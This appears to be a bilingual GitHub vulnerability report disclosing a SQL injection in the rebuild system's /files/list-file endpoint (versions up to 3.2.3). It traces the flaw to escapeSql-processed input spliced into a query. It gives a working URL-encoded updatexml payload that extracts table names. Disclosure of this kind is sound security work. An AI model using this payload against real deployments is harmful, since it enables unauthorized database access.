In the com.rebuild.web.files.FileListController#listFile() method, obtain the user's input and splice it into SqlWhere
在com.rebuild.web.files.FileListController#listFile()方法中,获取用户的输入,并拼接至SqlWhere中
The StringEscapeUtils.escapeSql method is used here to process user input, which poses a risk of being bypassed.
此处使用StringEscapeUtils.escapeSql方法对用户输入进行处理,此种方法存在绕过的风险。
Then insert SqlWhere into the final query statement and bring it into the query.
随后将SqlWhere插入到最终的查询语句中,并带入到查询中。
An attacker can implement a SQL injection vulnerability when passing in malicious SQL statements.
当攻击者传入恶意的sql语句时,即可实现SQL注入漏洞。
The end,thanks!
The text was updated successfully, but these errors were encountered:
版本 / Version
<=3.2.3
什么问题 / What's the problem
在rebuild系统的/files/list-file接口中存在SQL注入漏洞
There is a SQL injection vulnerability in the /files/list-file interface of the rebuild system.
如何复现此问题 / How to reproduce this problem
功能点 / Function points
请求信息 / Request message:
攻击载荷 / payload:
%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)+and%201%20=%20?%20--+漏洞复现 / Vulnerability recurrence
系统环境 (操作系统/MySQL版本/浏览器等) / System environment (OS/MySQL/Browser etc)
Mysql 5.7.26
Windows
JDK1.8.0_341
Chrome
说明 / Suggested description
sql injection vulnerability exists in rebuild <=3.2.3
在rebuild系统小于3.2.3版本中存在SQL注入漏洞
Failed to legally check parameters, resulting in SQL injection vulnerabilities.
未能合法检查参数从而导致sql注入漏洞.
漏洞类型 / Vulnerability Type
SQLi
产品供应商 / Vendor of Product
https://github.com/getrebuild/rebuild
受影响的产品代码库 / Affected Product Code Base
<=3.2.3
受影响组件 / Affected Component
/files/list-file
攻击方式 / Attack Type
Remote
漏洞成因 / Cause of vulnerability
In the


com.rebuild.web.files.FileListController#listFile()method, obtain the user's input and splice it into SqlWhere在
com.rebuild.web.files.FileListController#listFile()方法中,获取用户的输入,并拼接至SqlWhere中The
StringEscapeUtils.escapeSqlmethod is used here to process user input, which poses a risk of being bypassed.此处使用
StringEscapeUtils.escapeSql方法对用户输入进行处理,此种方法存在绕过的风险。Then insert SqlWhere into the final query statement and bring it into the query.
随后将SqlWhere插入到最终的查询语句中,并带入到查询中。
An attacker can implement a SQL injection vulnerability when passing in malicious SQL statements.
当攻击者传入恶意的sql语句时,即可实现SQL注入漏洞。
The end,thanks!
The text was updated successfully, but these errors were encountered: